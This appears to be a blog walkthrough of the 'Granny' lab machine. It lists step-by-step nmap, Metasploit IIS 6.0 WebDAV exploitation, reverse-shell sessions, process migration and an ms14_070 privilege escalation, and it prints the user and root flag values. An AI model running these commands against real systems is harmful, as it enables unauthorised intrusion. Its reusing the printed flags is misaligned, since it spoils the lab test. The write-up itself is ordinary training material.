top of page

Granny


As usual let's start with nmap:

nmap -sV -sC 10.129.170.231

We can see that the web server is on Microsoft-IIS/6.0.


I googled "IIS6 exploit" and found this article from rapid7:


Let's follow the steps in the article.


First, open a new command prompt and type the following to load metasploit:

msfconsole

As per the article let's type:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

show options

We need to set LHOST and RHOSTS as they are required fields.


LHOST (local host) should be set with the IP of your machine. If you don't know the IP of your machine, you can find out using ifconfig. My machine's IP is 10.10.14.21, yours will be different.

set LHOST 10.10.14.21

RHOST (remote host) is the target machine's IP:

set RHOSTS 

exploit

It worked!


shell

whoami

We are nt authority\network service

Great!


The shell is not great though. We need to escalate our privileges now.


Lets exit to return to the meterpreter shell

exit


Privilege Escalation


Let's use Lester, or Exploit Suggester. Lester is a module that scan the target for vulnerabilities. It is not actively exploiting them though, just scanning for them. However, you need to have a session opened on the target already to be able to use Lester. But we have a session already so let's try this.


run post/multi/recon/local_exploit_suggester

We get several exploits - let's pick exploit/windows/local/ms14_070_tcpip_ioctl


But first, let's see what processes are running on the target machine:

ps

We need to find a process that is running under NT AUTHORITY\NETWORK SERVICE


The process ID for davcdata.exe is PID 2292


Let's migrate to this process using:

migrate 2292

background

This tells us it is session 1


use exploit/windows/local/ms14_070_tcpip_ioctl

set SESSION 1

show options


set LHOST 10.10.14.21

exploit

It worked!!


shell

cd C:\Documents and Settings\Lakis\Desktop
dir
type user.txt

700c5dc163014e22b3e408f8703f67d1


Congratulations! You found the user flag!


cd C:\Documents and Settings\Administrator\Desktop
dir
type root.txt

aa4beed1c0584445ab463a6747bd06e9


Congratulations! You found the root flag!

198 views0 comments

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page